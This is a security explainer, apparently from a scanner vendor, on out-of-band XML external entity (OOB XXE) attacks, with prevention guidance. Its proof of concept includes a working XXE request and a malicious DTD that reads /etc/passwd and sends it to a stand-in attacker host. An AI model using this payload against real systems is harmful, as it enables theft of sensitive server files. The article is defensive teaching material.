Out-of-band XML external entity (OOB XXE)

What is OOB XXE?

Out-of-band XML external entity (OOB XXE) vulnerabilities are a type of XXE vulnerability where the attacker does not receive an immediate response to the XXE payload. The attack is conducted using one channel, such as a direct HTTP request, while the results (such as sensitive files) are received through another channel – often an HTTP server controlled by the attacker.

OOB XXE is sometimes confused with blind XXE due to the lack of a direct response, but with blind XXE, the attacker does not receive any response at all, instead reconstructing sensitive data step-by-step based on the behavior of the targeted app, such as the web server and XML parser errors it generates.

The process for exploiting out-of-band XXE vulnerabilities is similar to using parameter entities with in-band XXE. The attacker creates an external DTD (document type definition) that the attacked application then downloads from an attacker-controlled HTTP server.

While in-band XXE can be used to conduct denial of service (DoS) and server-side request forgery (SSRF) attacks against web apps and APIs, the primary goal of OOB XXE is sensitive data exfiltration.

Example of OOB XXE

The following is a PoC example of how an attacker could use parameter entities to steal sensitive data using an out-of-band (OOB) technique:

Request:

POST http://example.com/xml HTTP/1.1
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE data [
  <!ENTITY % file SYSTEM
  "file:///etc/passwd">
  <!ENTITY % dtd SYSTEM
  "http://bad.example.com/evil.dtd">
  %dtd;
]>
<data>&send;</data>

Malicious DTD (bad.example.com/evil.dtd):

<!ENTITY % all "<!ENTITY send SYSTEM 'http://bad.example.com/?collect=%file;'>">
%all;

The attack is conducted as follows:

  1. The XML parser first parses the %file parameter entity, loading the file /etc/passwd.
  2. Next, the XML parser resolves the %dtd parameter entity and makes a request to get the attacker’s DTD file at http://bad.example.com/evil.dtd.
  3. After the parser has processed the attacker’s DTD file, the %all parameter entity creates a general entity called &send that contains a URL. This URL uses the %file parameter entity, which was resolved in step 1 and now holds the content of a local file. In this case, this is the content of the Linux /etc/passwd file.
  4. Finally, after the URL is constructed, the XML parser processes the &send XML entity, thus sending a request to the attacker’s server.
  5. The attacker can log the request on their end and reconstruct the file from the log entry.

Note that this specific attack is not designed to send binary files to the attacker’s server because of URL format limitations. However, you may be able to work around these limitations using techniques such as PHP wrappers to encode the file using Base64.

How to prevent out-of-band XXE vulnerabilities?

The only effective way to prevent malicious hackers from exploiting XXE attacks, both in-band XXE and OOB XXE, is to completely block developers from using XML external entities in XML content coming from untrusted sources. In addition, OWASP recommends that you completely disable support for processing external document type definitions and require developers to use only static, local DTDs. If your web application has functionality that requires the use of external DTDs, you should at least disable support for external entities in external DTDs. We do not recommend relying on manual validation or sanitization of XML documents before processing as a way to prevent XXE attacks.

To learn how to disable DTD and XXE processing in your specific XML parser, refer to the relevant OWASP XXE prevention cheat sheet, which contains instructions for many commonly used programming languages and XML parsers.

Frequently asked questions

What is OOB XXE?

OOB XXE stands for out-of-band XML external entity. OOB XXE vulnerabilities are a type of XXE vulnerability where the attacker does not receive an immediate response to the XXE payload. The attack is conducted using one channel, like a direct HTTP request, while the results are received through another channel – typically sent to an HTTP server controlled by the attacker.

 

Learn how Invicti detects different types of OOB vulnerabilities using its Hawk engine.

When is OOB XXE possible?

OOB XXE is possible if the application is vulnerable to XXE and the attacker has a web server that they can use to host malicious DTDs and receive responses. OOB XXE is the preferred attack technique when the attacker has no way to directly receive responses from a vulnerable application, for example, if the content of an uploaded XML document cannot be displayed.

 

See a detailed description of OOB XXE exploitation by Dhiyaneshwaran.

How to prevent OOB XXE?

The best way to prevent OOB XXE vulnerabilities and all other types of XXE vulnerabilities is to completely disable document type definitions (DTDs) in your XML parser. If this is not possible, you should at least disable support for external entities and external document type declarations for your parser.

 

Learn how to disable external entities and external document type declarations for your language and parser.


Written by: Tomasz Andrzej Nidecki, reviewed by: Benjamin Daniel Mussler